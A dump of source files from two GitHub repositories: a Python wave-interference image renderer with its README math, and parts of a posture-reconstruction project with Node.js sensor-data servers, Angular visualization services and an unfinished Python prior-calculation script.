href=\"https://www.codecogs.com/eqnedit.php?latex=\\frac{\\lambda&space;s}{2\\pi}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/svg.latex?\\frac{\\lambda&space;s}{2\\pi}\" title=\"\\frac{\\lambda s}{2\\pi}\" /></a>\n\n, where *s* is the number of pixels per unit distance (pixel **s**cale), produces a wave with a wavelength of *s* px:\n\n<a href=\"https://www.codecogs.com/eqnedit.php?latex=I&space;=&space;\\sin{\\frac{2\\pi&space;d}{\\lambda&space;s}}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/svg.latex?I&space;=&space;\\sin{\\frac{2\\pi&space;d}{\\lambda&space;s}}\" title=\"I = \\sin{\\frac{2\\pi d}{\\lambda s}}\" /></a>\n\nNext the wave is translated along the x axis as a function of the amount of time which has passed, allowing animation. 
If the wave moves along the *d* axis at a rate of one wavelength per second, then its displacement, *k*, is given as:\n\n<a href=\"https://www.codecogs.com/eqnedit.php?latex=\\begin{align*}&space;k&space;&=&space;t_{seconds}&space;\\cdot&space;\\lambda&space;s&space;+&space;p&space;\\lambda&space;s\\\\&space;&=&space;\\frac{t&space;\\lambda&space;s}{f}+&space;p&space;\\lambda&space;s&space;\\end{align*}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/svg.latex?\\begin{align*}&space;k&space;&=&space;t_{seconds}&space;\\cdot&space;\\lambda&space;s&space;+&space;p&space;\\lambda&space;s\\\\&space;&=&space;\\frac{t&space;\\lambda&space;s}{f}+&space;p&space;\\lambda&space;s&space;\\end{align*}\" title=\"\\begin{align*} k &= t_{seconds} \\cdot \\lambda s + p \\lambda s\\\\ &= \\frac{t \\lambda s}{f}+ p \\lambda s \\end{align*}\" /></a>, where:\n* *t* is time in frames, and *f* is video frame rate.\n* *p* is phase, as a fraction of wavelength\n\n<a href=\"https://www.codecogs.com/eqnedit.php?latex=\\begin{align*}&space;\\therefore&space;I&space;&=&space;\\sin{\\frac{2\\pi&space;(d-k)}{\\lambda&space;s}}\\\\&space;&=&space;\\sin{\\frac{2\\pi&space;(d-\\frac{t&space;\\lambda&space;s}{f}&space;-&space;p&space;\\lambda&space;s)}{\\lambda&space;s}}\\\\&space;&=&space;\\sin{\\frac{2\\pi&space;(\\frac{fd&space;-&space;t&space;\\lambda&space;s-&space;fp&space;\\lambda&space;s}{f})}{\\lambda&space;s}}\\\\&space;&=&space;\\sin{\\frac{2\\pi&space;(fd&space;-&space;t&space;\\lambda&space;s-&space;fp&space;\\lambda&space;s)}{f&space;\\lambda&space;s}}&space;\\end{align*}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/svg.latex?\\begin{align*}&space;\\therefore&space;I&space;&=&space;\\sin{\\frac{2\\pi&space;(d-k)}{\\lambda&space;s}}\\\\&space;&=&space;\\sin{\\frac{2\\pi&space;(d-\\frac{t&space;\\lambda&space;s}{f}&space;-&space;p&space;\\lambda&space;s)}{\\lambda&space;s}}\\\\&space;&=&space;\\sin{\\frac{2\\pi&space;(\\frac{fd&space;-&space;t&space;\\lambda&space;s-&space;fp&space;\\lambda&space;s}{f})}{\\lambda&space;s}}\\\\&space;&=&space;\\sin{\\frac{2\\pi&space;(fd&space;-&space;t&space;\\lambda&space;s-&space;fp&space;\\lambda&space;s)}{f&space;\\lambda&space;s}}&space;\\end{align*}\" title=\"\\begin{align*} \\therefore I &= \\sin{\\frac{2\\pi (d-k)}{\\lambda s}}\\\\ &= \\sin{\\frac{2\\pi (d-\\frac{t \\lambda s}{f} - p \\lambda s)}{\\lambda s}}\\\\ &= \\sin{\\frac{2\\pi (\\frac{fd - t \\lambda s- fp \\lambda s}{f})}{\\lambda s}}\\\\ &= \\sin{\\frac{2\\pi (fd - t \\lambda s- fp \\lambda s)}{f \\lambda s}} \\end{align*}\" /></a>\n\nAlso, *k* gives the leading edge of the wave, allowing restriction of the wave domains:\n\n<a href=\"https://www.codecogs.com/eqnedit.php?latex=I&space;=&space;f(d)&space;\\left\\{&space;\\begin{array}{lr}&space;d>k&space;:&space;0\\\\&space;d\\leq&space;k:&space;\\sin{\\frac{2\\pi&space;(fd&space;-&space;t&space;\\lambda&space;s-&space;fp&space;\\lambda&space;s)}{f&space;\\lambda&space;s}}&space;\\end{array}&space;\\right.\" target=\"_blank\"><img src=\"https://latex.codecogs.com/svg.latex?I&space;=&space;f(d)&space;\\left\\{&space;\\begin{array}{lr}&space;d>k&space;:&space;0\\\\&space;d\\leq&space;k:&space;\\sin{\\frac{2\\pi&space;(fd&space;-&space;t&space;\\lambda&space;s-&space;fp&space;\\lambda&space;s)}{f&space;\\lambda&space;s}}&space;\\end{array}&space;\\right.\" title=\"I = f(d) \\left\\{ \\begin{array}{lr} d>k : 0\\\\ d\\leq k: \\sin{\\frac{2\\pi (fd - t \\lambda s- fp \\lambda s)}{f \\lambda s}} \\end{array} \\right.\" /></a>\n## Time Scale\nThe <a
href=\"https://www.codecogs.com/eqnedit.php?latex=t_{\\text{seconds}}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?t_{\\text{seconds}}\" title=\"t_{\\text{seconds}}\" /></a> value above, is in terms of video seconds. However, if the waves are assumed to be sound in air, an absolute time value can be calculated. In one video second, the wave travels 1 wavelength. The speed of sound in air is 343 ms<sup>-1</sup>. Therefore, the sound wave takes <a href=\"https://www.codecogs.com/eqnedit.php?latex=\\frac{1}{343}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?\\frac{1}{343}\" title=\"\\frac{1}{343}\" /></a> virtual seconds to travel that one wavelength, 1m (only if <a href=\"https://www.codecogs.com/eqnedit.php?latex=\\lambda&space;=&space;1\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?\\lambda&space;=&space;1\" title=\"\\lambda = 1\" /></a>). Therefore, 1 video second (25 frames) = <a href=\"https://www.codecogs.com/eqnedit.php?latex=\\frac{1}{343}\" target=\"_blank\"><img src=\"https://latex.codecogs.com/gif.latex?\\frac{1}{343}\" title=\"\\frac{1}{343}\" /></a> virtual seconds.\n\n\n## Demo\nWatch on YouTube:\nhttps://www.youtube.com/watch?v=CgBImdjw3hc\n\n[](https://www.youtube.com/watch?v=CgBImdjw3hc)\n"
},
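The piecewise intensity function derived in this README translates directly into code. A minimal sketch (parameter names follow the README: d distance, f frame rate, t time in frames, s pixel scale, lam wavelength, p phase as a fraction of wavelength):

```python
import math

def intensity(d, f, t, s, lam, p):
    # Leading edge k = (t*lam*s)/f + p*lam*s; the wave is zero beyond it.
    k = (t * lam * s) / f + p * lam * s
    if d > k:
        return 0.0
    # I = sin(2*pi*(f*d - t*lam*s - f*p*lam*s) / (f*lam*s))
    return math.sin(2 * math.pi * (f * d - t * lam * s - f * p * lam * s) / (f * lam * s))

# At the leading edge the argument is zero, so the wave starts at 0.
print(intensity(50.0, 25, 125, 10, 1, 0))  # d == k here, so this prints 0.0
```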
{
"alpha_fraction": 0.47329607605934143,
"alphanum_fraction": 0.48916199803352356,
"avg_line_length": 30.521127700805664,
"blob_id": "2aa8699a28ff183c8714df8e1348cf4290f4713d",
"content_id": "e424813c50eef21b1c1a006d31edaecf2eea0df8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4475,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 142,
"path": "/interference.py",
"repo_name": "tomnwright/Interference-Simulation",
"src_encoding": "UTF-8",
"text": "import math,time,colour\nfrom PIL import Image, ImageDraw\n\ndef clamp(n,upper,lower):\n if n>upper:\n return 1\n elif n<lower:\n return -1\n else:\n return n\ndef get_dist2D(a,b):\n x = a[0]-b[0]\n y = a[1]-b[1]\n return math.sqrt((x**2)+(y**2))\ndef compile(images):\n img = images[0]\n for i in images[1:]:\n img = Image.alpha_composite(img,i)\n return img\nclass wave:\n @staticmethod\n def get_Intensity(d, f, t, s, w, p):\n '''\n Get Wave Intensity\n\n :param d: distance\n :param f: frame rate\n :param t: time (frames)\n :param s: scale (pixels per meter)\n :param w: wavelength\n :param p: phase (fraction of wavelegth)'''\n leading_edge = ((t*s*w)/f) + (p*w*s)\n if d>leading_edge:\n return 0\n else:\n return math.sin(\n (2*math.pi* ((f*d)-(t*s*w)-(f*p*w*s)))/(f*w*s)\n )\n @staticmethod\n def get_Peak(n,t,l,s,f):\n '''\n :param n: nth peak\n :param t: time(frames)\n :param l: lambda (wavelength)\n :param s: Scale (pixels per meter)\n :param f: frame rate '''\n return ((t-((n+0.75)*f))*l*s)/f\n @staticmethod\n def get_Trough(n,t,l,s,f):\n '''\n :param n: nth trough\n :param t: time(frames)\n :param l: lambda (wavelength)\n :param s: Scale (pixels per meter)\n :param f: frame rate '''\n return ((t-((n+0.25)*f))*l*s)/f\n\nclass handler:\n def __init__(self, sources=[], res=(0,0,), scale=1):\n '''\n :param sources: List of sources (class: source)\n :param res: Resolution\n :param scale: Pixel Scale/ pixels per metre'''\n self.sources = sources\n self.res = res\n self.scale = scale\n\n def render_img(self, time, frame_rate):\n img = Image.new('RGB', self.res)\n for x in range(self.res[0]):\n for y in range(self.res[1]):\n loc = (x,y,)\n i_total = 0\n for s in self.sources:\n i_total += wave.get_Intensity(\n get_dist2D(s.location, loc),\n frame_rate,\n time,\n self.scale,\n s.wavelength,\n s.phase\n )\n i_total = (i_total)/len(self.sources) #THIS MAKES MULTISOURCE UNIVERSE WAVES FADED\n img.putpixel((x,y,),colour.get_rgb(i_total))\n return img\n \n def render_animation(self, file, frames, frame_rate):\n for frame in range(frames[0],frames[1]):\n print(frame,end = '')\n out_img = self.render_img(frame, frame_rate)\n out_img.save('{}{}.png'.format(file,frame),format = 'PNG')\n print(': Saved')\n\n def render_contours(self, pOt, time, frame_rate):\n '''\n :param pOt: peak Or trough\n :param time: time (frames)\n '''\n rendered = []\n for s in self.sources:\n loc = s.location\n img_render = Image.new('RGBA', self.res)\n img_draw = ImageDraw.Draw(img_render, 'RGBA')\n i = 0\n while True:\n r = pOt(i, time, s.wavelength, self.scale, frame_rate)\n if r<0:\n break\n else:\n img_draw.ellipse((loc[0]-r, loc[1]-r, loc[0]+r, loc[1]+r),(0, 0, 0, 0),outline = 'white')\n i+=1\n del img_draw\n rendered.append(img_render)\n return compile(rendered)\n\n def animate_contours(self, file, frames, frame_rate):\n\n for frame in range(frames[0], frames[1]):\n print(frame, end='')\n\n out_t = self.render_contours(wave.get_Peak, frame, frame_rate)\n out_t.save('{}troughs{}.png'.format(file, frame), format = 'PNG')\n\n out_p = self.render_contours(wave.get_Trough, frame, frame_rate)\n out_p.save('{}peaks{}.png'.format(file, frame), format = 'PNG')\n\n print(': Saved')\n\nclass source:\n def __init__(self, location, wavelength, phase):\n self.location = location\n self.wavelength = wavelength\n self.phase = phase\n\nif __name__ == '__main__':\n res = (600,600,)\n s = [\n source((250,300,),1,-1),\n source((350,300,),1,0),\n ]\n u = handler(s,res,20)\n u.render_animation('test/anim',(0,500,),25)"
},
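`render_img` in interference.py superposes one wave per source at each pixel and divides by the source count so the result stays inside the colour ramp's [-1, 1] domain. A standalone sketch of that per-pixel step, reusing the intensity formula from the README (the pixel and source values are illustrative):

```python
import math

def dist2d(a, b):
    return math.hypot(a[0] - b[0], a[1] - b[1])

def superpose(pixel, sources, f, t, s):
    # sources: list of (location, wavelength, phase) triples.
    total = 0.0
    for loc, lam, p in sources:
        d = dist2d(loc, pixel)
        k = (t * lam * s) / f + p * lam * s  # leading edge of this wave
        if d <= k:
            total += math.sin(2 * math.pi * (f * d - t * lam * s - f * p * lam * s) / (f * lam * s))
    # Averaging keeps the sum inside [-1, 1] for the colour ramp, at the
    # cost of fading single-source regions (the comment in render_img).
    return total / len(sources)

print(superpose((300, 300), [((250, 300), 1, 0), ((350, 300), 1, 0)], 25, 500, 20))
```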
{
"alpha_fraction": 0.3813559412956238,
"alphanum_fraction": 0.4378530979156494,
"avg_line_length": 12.65384578704834,
"blob_id": "9c7b5878309ef527cb27f5a327c6c1a4e7051065",
"content_id": "107e8108dcd50d7ec883f2e2f0bcef99b89ffa83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 354,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 26,
"path": "/colour.py",
"repo_name": "tomnwright/Interference-Simulation",
"src_encoding": "UTF-8",
"text": "#colour ramp\n\ndef get_rgb(n):\n return (\n int(get_r(n)*255),\n int(get_g(n)*255),\n int(get_b(n)*255)\n )\n\ndef get_r(n):\n if n>0:\n return 1.0\n else:\n return n+1\n\ndef get_b(n):\n if n<0:\n return 1.0\n else:\n return 1-n\n\ndef get_g(n):\n if n>=0:\n return 1-n\n else:\n return n+1"
}
] | 3 |
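colour.py implements the blue-white-red ramp as three piecewise-linear channel functions over [-1, 1]. An inline restatement that is easy to sanity-check at the three landmark values (-1 blue, 0 white, +1 red):

```python
def ramp(n):
    # n in [-1, 1]: -1 maps to blue, 0 to white, +1 to red, linearly between.
    r = 1.0 if n > 0 else n + 1      # red saturates for positive n
    g = 1 - n if n >= 0 else n + 1   # green fades away from zero on both sides
    b = 1.0 if n < 0 else 1 - n      # blue saturates for negative n
    return tuple(int(c * 255) for c in (r, g, b))

print(ramp(-1.0), ramp(0.0), ramp(1.0))  # (0, 0, 255) (255, 255, 255) (255, 0, 0)
```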
JW2473/Posture-Reconstruction
|
https://github.com/JW2473/Posture-Reconstruction
|
a9437a3dfda1f008003051c999696f565a5c41d8
|
d3b543fd534c54e85c440b9c44cd3b44a169243e
|
ad74734c428068b84bbc79f88aa12c16c9a0abc0
|
refs/heads/master
| 2020-04-07T05:47:59.338813 | 2019-01-18T05:03:06 | 2019-01-18T05:03:06 | 158,110,473 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7005494236946106,
"alphanum_fraction": 0.7204670310020447,
"avg_line_length": 45.967742919921875,
"blob_id": "b56a3edb552e46cad3a2431a9f4afd68f0b08b14",
"content_id": "e5df1ce908ec2bdcdc3cf4b2f901d074e42f205e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2912,
"license_type": "no_license",
"max_line_length": 273,
"num_lines": 62,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer/db_service.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst Promise = require('bluebird')\nconst db = require('sqlite')\nconst fs = require('fs')\nconst UPDATE_INTERVAL = 600\nconst dbInit = fs.readFileSync('./dbInit.sql').toString()\nvar dbPromise = db.open('./userActivityData.db', {Promise})\ndbPromise.then(() => db.exec(dbInit))\ndbPromise = startTransaction(dbPromise)\n\nvar insertSensorData100HzStmt\nvar insertSensorData20HzStmt\nvar insertSensorMessageStmt\n\nfunction insertSensorData100Hz (serverId, sensorId, serverSendTimestamp, data) {\n dbPromise = dbPromise.then(() => insertSensorData100HzStmt.run([serverId, sensorId, serverSendTimestamp, data.syncedTimestamp, data.timestamp, data.quat_w, data.quat_x, data.quat_y, data.quat_z, data.gyro_x, data.gyro_y, data.gyro_z, data.acc_x, data.acc_y, data.acc_z]))\n .catch(e => {\n console.log('insertSensorData100Hz Error:')\n console.log(e)\n })\n}\n\nfunction insertSensorData20Hz (serverId, sensorId, serverSendTimestamp, data) {\n dbPromise = dbPromise.then(() => insertSensorData20HzStmt.run([serverId, sensorId, serverSendTimestamp, data.syncedTimestamp, data.timestamp, data.magn_x, data.magn_y, data.magn_z]))\n .catch(e => {\n console.log('insertSensorData20Hz Error:')\n console.log(e)\n })\n}\n\nfunction insertSensorMessage (serverId, sensorId, serverSendTimestamp, clientRecvTimestamp, clientSendTimestamp, serverRecvTimestamp, num100hzData, num20hzData) {\n dbPromise = dbPromise.then(() => insertSensorMessageStmt.run([serverId, sensorId, serverSendTimestamp, clientRecvTimestamp, clientSendTimestamp, serverRecvTimestamp, num100hzData, num20hzData]))\n .catch(e => {\n console.log('insertSensorMessage Error:')\n console.log(e)\n })\n}\n\nsetInterval(() => {\n dbPromise = startTransaction(dbPromise.then(() => db.run('commit')))\n}, UPDATE_INTERVAL)\n\nfunction startTransaction (p) {\n return p.then(() => db.run('BEGIN TRANSACTION'))\n .then(() => {\n return db.prepare('INSERT INTO SensorData100Hz(server_id, sensor_id, server_send_timestamp, sensor_synced_timestamp, sensor_raw_timestamp, quat_w, quat_x, quat_y, quat_z, gyro_x, gyro_y, gyro_z, acc_x, acc_y, acc_z) VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)')\n }).then(stmt => {\n insertSensorData100HzStmt = stmt\n return db.prepare('INSERT INTO SensorData20Hz(server_id, sensor_id, server_send_timestamp, sensor_synced_timestamp, sensor_raw_timestamp, magn_x, magn_y, magn_z) VALUES(?, ?, ?, ?, ?, ?, ?, ?)')\n }).then(stmt => {\n insertSensorData20HzStmt = stmt\n return db.prepare('INSERT INTO SensorMessage(server_id, sensor_id, server_send_timestamp, client_recv_timestamp, client_send_timestamp, server_recv_timestamp, num_100hz_data, num_20hz_data) VALUES (?, ?, ?, ?, ?, ?, ?, ?)')\n }).then(stmt => {\n insertSensorMessageStmt = stmt\n })\n}\n\nmodule.exports = {\n insertSensorData100Hz: insertSensorData100Hz,\n insertSensorData20Hz: insertSensorData20Hz,\n insertSensorMessage: insertSensorMessage\n}\n"
},
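db_service.js trades durability for throughput: every insert rides an open transaction through a prepared statement, and a timer commits and reopens the transaction every 600 ms. The same batching pattern in Python's sqlite3, for comparison (a sketch; the table and columns are invented):

```python
import sqlite3, time

con = sqlite3.connect('userActivityData.db')
con.execute('CREATE TABLE IF NOT EXISTS samples(ts INTEGER, value REAL)')

last_commit = time.time()
for ts in range(100000):
    # Each execute joins the transaction already in progress; nothing
    # is flushed to disk per row.
    con.execute('INSERT INTO samples VALUES (?, ?)', (ts, 0.0))
    if time.time() - last_commit > 0.6:  # commit every 600 ms, like UPDATE_INTERVAL
        con.commit()
        last_commit = time.time()
con.commit()
con.close()
```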
{
"alpha_fraction": 0.7111111283302307,
"alphanum_fraction": 0.7166666388511658,
"avg_line_length": 30.034482955932617,
"blob_id": "1f15cf770d9c07a8f48c45d33b6bc43b6d4bffce",
"content_id": "b6f57c3a8d37927f974f24afda6de9de0f20ca36",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 900,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 29,
"path": "/oriTrakHAR-master/robotVisualizationRealtime/src/app/app.module.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { BrowserModule } from '@angular/platform-browser';\nimport { NgModule } from '@angular/core';\nimport { CommonModule } from '@angular/common';\n\nimport { AppComponent } from './app.component';\nimport { DataModelService } from './services/data-model.service';\nimport { SocketIoModule, SocketIoConfig } from './modules/ng2-socket-io';\nimport { SockService } from './services/sock.service';\nimport { wsAddr } from './serverAddr';\n\nimport { NvD3Module } from 'angular2-nvd3';\nimport { StickFigureComponent } from './components/stick-figure/stick-figure.component';\n\nconst config: SocketIoConfig = { url: wsAddr, options: {} };\n\n@NgModule({\n declarations: [\n AppComponent,\n StickFigureComponent,\n ],\n imports: [\n BrowserModule,\n SocketIoModule.forRoot(config),\n NvD3Module\n ],\n providers: [SockService, DataModelService],\n bootstrap: [AppComponent]\n})\nexport class AppModule { }\n"
},
{
"alpha_fraction": 0.667397677898407,
"alphanum_fraction": 0.6714181303977966,
"avg_line_length": 31.188236236572266,
"blob_id": "b7b38081917160b5fba79b9cdefb51fe6c155c26",
"content_id": "8f8a2d8c727baa7ec5ec643a53b6a6812d9b3bdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 2736,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 85,
"path": "/oriTrakHAR-master/rawDataVis/src/app/services/sock.service.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Injectable } from '@angular/core';\nimport { Socket } from '../modules/ng2-socket-io';\nimport { DataModelService } from './data-model.service';\n// import { AngleData } from '../prototypes';\n\n@Injectable()\nexport class SockService {\n status = this.dataModel.status;\n constructor(private socket: Socket, private dataModel: DataModelService) {\n const self = this;\n const counter = 0;\n let lastTimeStamp = 0;\n socket.on('connect', (msg) => {\n console.log('on connect');\n });\n socket.on('newData', newDataHandle);\n socket.on('availableDates', availableDatesHandle);\n socket.on('playEnd', playEndHandle);\n socket.on('disconnect', playEndHandle);\n socket.on('updateHist', updateHistHandle);\n socket.on('availableClusters', availableClustersHandle);\n socket.on('clusterData', clusterDataHandle);\n function newDataHandle(msg) {\n // console.log(msg);\n dataModel.status[msg.id].quaternion.w = msg.quat.w;\n dataModel.status[msg.id].quaternion.x = msg.quat.x;\n dataModel.status[msg.id].quaternion.y = msg.quat.y;\n dataModel.status[msg.id].quaternion.z = msg.quat.z;\n const approximatedTimestamp = Math.floor(msg.quat.timestamp / 1000) * 1000;\n if (approximatedTimestamp !== lastTimeStamp) {\n // console.log(`new msg ${msg.quat.timestamp}`);\n dataModel.status.playingTime = new Date(msg.quat.timestamp);\n lastTimeStamp = msg.quat.timestamp;\n }\n }\n\n function playEndHandle(msg) {\n dataModel.status.playing = false;\n }\n\n function availableDatesHandle(msg) {\n dataModel.status.availableDates = msg;\n }\n\n function updateHistHandle(msg) {\n dataModel.newHistUpdate.next(msg);\n }\n\n function availableClustersHandle(msg) {\n dataModel.status.availableClusters = msg;\n }\n\n function clusterDataHandle(data) {\n dataModel.clusterData[data.cluster_id] = data.dataByCluster;\n var clustersOnOff = {}\n\n Object.keys(data.dataByCluster).forEach(d => {\n clustersOnOff[d] = true\n });\n dataModel.status.clustersOnOff = clustersOnOff\n dataModel.updateDisplayClusterData();\n }\n }\n\n public play(start, end, ratio, data) {\n this.socket.emit('play', {start, end, ratio, data});\n }\n\n public stop() {\n this.socket.emit('stop', {});\n }\n\n public pause() {\n this.socket.emit('pause', {});\n }\n\n public updateHist() {\n this.socket.emit('updateHist', {start: this.status.histStartTime.valueOf(), end: this.status.histEndTime.valueOf(), source: this.status.selectedHistSource, data: this.status.selectedDate})\n }\n\n public getClusterData(clusterName) {\n this.socket.emit('requestClusterData', {clusterId: this.status.availableClusters[clusterName]})\n }\n\n}\n"
},
{
"alpha_fraction": 0.594565212726593,
"alphanum_fraction": 0.665217399597168,
"avg_line_length": 40.818180084228516,
"blob_id": "e25606bb56d588b669bebd2516caee2941e14ab8",
"content_id": "25de7f58186a92cc344869aa9062c0c01ff48afb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2760,
"license_type": "no_license",
"max_line_length": 236,
"num_lines": 66,
"path": "/python-code/calc_prior.py",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "from processData import readData, InterpoQuat\nimport subprocess\nimport transformations\nimport numpy as np\n\nwrist_file_name = 'leftWrist.csv'\nelbow_file_name = 'leftElbow.csv'\ntorso_file_name = 'torso.csv'\nbucketSize = 5\n\nf = open('leftPrior', 'w')\nw = readData([0, 1, 2], wrist_file_name)\ne = readData([0, 1, 2], elbow_file_name)\nt = readData([0, 1, 2], torso_file_name)\ntail = subprocess.run('tail '+wrist_file_name, stdout=subprocess.PIPE, shell=True)\ntail = tail.stdout.decode('utf-8')\nlastline = tail.split('\\n')[-2]\nmax_time = lastline.split(', ')[-1]\nt = np.linspace(5, max_time, (max_time-5)*50)\nwristQuats = InterpoQuat(w).evaluate(t)\nelbowQuats = InterpoQuat(e).evaluate(t)\ntorsoQuats = InterpoQuat(t).evaluate(t)\n\nfor i in range(-175, 176, 5):\n prior[i] = {}\n for j in range(-175, 176, 5):\n prior[i][j] = {}\n for k in range(-175, 176, 5):\n prior[i][j][k] = np.zeros([21, 21, 21])\n\nfor i in t:\n torsoQuat = next(torsoQuats)\n wristQuat = next(wristQuats)\n elbowQuat = next(elbowQuats)\n wristRelativeQuat = torsoQuat.inverse*wristQuat\n elbowRelativeQuat = elbowQuat.inverse*elbowQuat\n wristEuler = transformations.euler_from_quaternion([wristRelativeQuat[1], wristRelativeQuat[2], wristRelativeQuat[3], wristRelativeQuat[0]])\n elbowEuler = transformations.euler_from_quaternion([elbowRelativeQuat[1], elbowRelativeQuat[2], elbowRelativeQuat[3], elbowRelativeQuat[0]])\n elbowRelativePos = elbowRelativeQuat.rotate([0, 0, -1])\n prior[rad2Bucket(wristEuler[0])][rad2Bucket(wristEuler[1])][rad2Bucket(wristEuler[2])][elbowRelativePos[0]*10 + 10][elbowRelativePos[1]*10 + 10][elbowRelativePos[2]*10 + 10] += 0.5\n elbowRelativePos = elbowRelativeQuat.rotate([0, 0, -1.1])\n prior[rad2Bucket(wristEuler[0])][rad2Bucket(wristEuler[1])][rad2Bucket(wristEuler[2])][min(max(elbowRelativePos[0]*10 + 10, 0), 20)][min(max(elbowRelativePos[1]*10 + 10, 0), 21)][min(max(elbowRelativePos[2]*10 + 10, 0), 20)] += 0.25\n elbowRelativePos = elbowRelativeQuat.rotate([0, 0, -0.9])\n prior[rad2Bucket(wristEuler[0])][rad2Bucket(wristEuler[1])][rad2Bucket(wristEuler[2])][elbowRelativePos[0]*10 + 10][elbowRelativePos[1]*10 + 10][elbowRelativePos[2]*10 + 10] += 0.25\n\nfor i in range(-175, 176, 5):\n for j in range(-175, 176, 5):\n for k in range(-175, 176, 5):\n if np.sum(prior[i][j][k]) == 0:\n prior[i][j][k] = None\n else:\n prior[i][j][k] = prior[i][j][k].tostring()\n\njson.dump(prior, f)\nf.close()\n\ndef rad2Bucket(rad):\n radInterval = bucketSize*3.1415926/180\n ans = math.floor(rad / radInterval) * bucketSize\n if ans == 180:\n return 180 - bucketSize\n else:\n return ans\n\ndef deg2rad(deg):\n return deg * 3.1415926 / 180\n"
},
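The bucketing at the heart of calc_prior.py quantizes an angle in radians into 5-degree bin labels, folding the +180 edge into the top bin so bins run from -180 to 175. Isolated for testing (the same formula as rad2Bucket above):

```python
import math

BUCKET = 5  # degrees per bin, as bucketSize in calc_prior.py

def rad2bucket(rad):
    interval = BUCKET * math.pi / 180
    ans = math.floor(rad / interval) * BUCKET
    return 180 - BUCKET if ans == 180 else ans

# -pi lands in the -180 bin, +pi folds into the 175 bin, 0 maps to bin 0.
print(rad2bucket(-math.pi), rad2bucket(0.0), rad2bucket(math.pi))  # -180 0 175
```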
{
"alpha_fraction": 0.7309644818305969,
"alphanum_fraction": 0.7411167621612549,
"avg_line_length": 63.66666793823242,
"blob_id": "b5a06d13e0dd059a5def8e2062134d5ef26ad4ad",
"content_id": "780db4fff880c6f5d9c0b299951100c848622f6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 197,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 3,
"path": "/oriTrakHAR-master/robotVisualizationRealtime/src/app/modules/ng2-socket-io/index.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "export { Ng2SocketIoModule as SocketIoModule } from './ng2-socket-io.module';\r\nexport { SocketIoConfig } from './socketIoConfig';\r\nexport { SocketIoService as Socket } from './socket-io.service';\r\n"
},
{
"alpha_fraction": 0.6486860513687134,
"alphanum_fraction": 0.6671277284622192,
"avg_line_length": 27.920000076293945,
"blob_id": "407f3385a339cb913da09c474c4833710d17d872",
"content_id": "ce945bd79ffe9fbf6f0c47ac481e3eb50bb8d702",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2169,
"license_type": "no_license",
"max_line_length": 204,
"num_lines": 75,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer/oldDataServer/dataServer_backup.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst net = require('net')\nconst os = require('os')\nconst dataServer = net.createServer()\nconst config = require('./config')\n// const dbService = require('./db_service')\n// const Promise = require('bluebird')\n// const realtimeVis = require('./realtimeVis')\n// const express = require('express')\n\n// var app = express()\nvar macAddr\nconst platform = os.platform()\nif (platform === 'darwin') {\n macAddr = os.networkInterfaces().en3[0].mac\n} else if (platform === 'linux') {\n try {\n macAddr = os.networkInterfaces().wlan0[0].mac // change wlan0 to what ever interface you are using\n } catch (e) {\n macAddr = os.networkInterfaces().wlan1[0].mac // change wlan0 to what ever interface you are using\n }\n}\nconst machineId = mac2Id(macAddr)\n\nvar clients = {}\nvar clientIDList = []\nvar curPollClientID = 0\n\ndataServer.on('connection', socket => {\n const clientId = socket.remoteAddress.split(':')[3]\n if (!clients.hasOwnProperty(clientId)) {\n clients[clientId] = {\n sock: socket,\n mac: ''\n }\n }\n clientIDList.push(clientId)\n socket.on('data', processDataGen(clientId))\n socket.on('end', () => { delClient(clientId) })\n socket.on('error', err => {\n console.log(err)\n socket.end()\n delClient(clientId)\n })\n})\n\nfunction delClient (clientId) {\n clientIDList = clientIDList.filter(id => id !== clientId)\n delete clients[clientId]\n}\n\ndataServer.listen(config.PORT)\n\nsetInterval(() => {\n if (clientIDList.length > 0) {\n var msg = Buffer.alloc(4)\n msg.writeFloatLE(new Date().valueOf(), 0)\n console.log(`${msg} len-${msg.length}`)\n clients[clientIDList[curPollClientID]].sock.write(msg)\n curPollClientID++\n if (curPollClientID >= clientIDList.length) {\n curPollClientID = 0\n }\n }\n}, config.POLL_INTERVAL)\n\nfunction processDataGen (clientId) {\n return function processData (data) {\n console.log(`got data from id ${clientId} and data length: ${data.length}`)\n }\n}\n\nfunction mac2Id (mac) {\n return Buffer.from([Buffer.from(mac.substring(6, 8), 16), Buffer.from(mac.substring(9, 11), 16), Buffer.from(mac.substring(12, 14), 16), Buffer.from(mac.substring(15, 17), 16)].join('')).readUInt32LE(0)\n}\n"
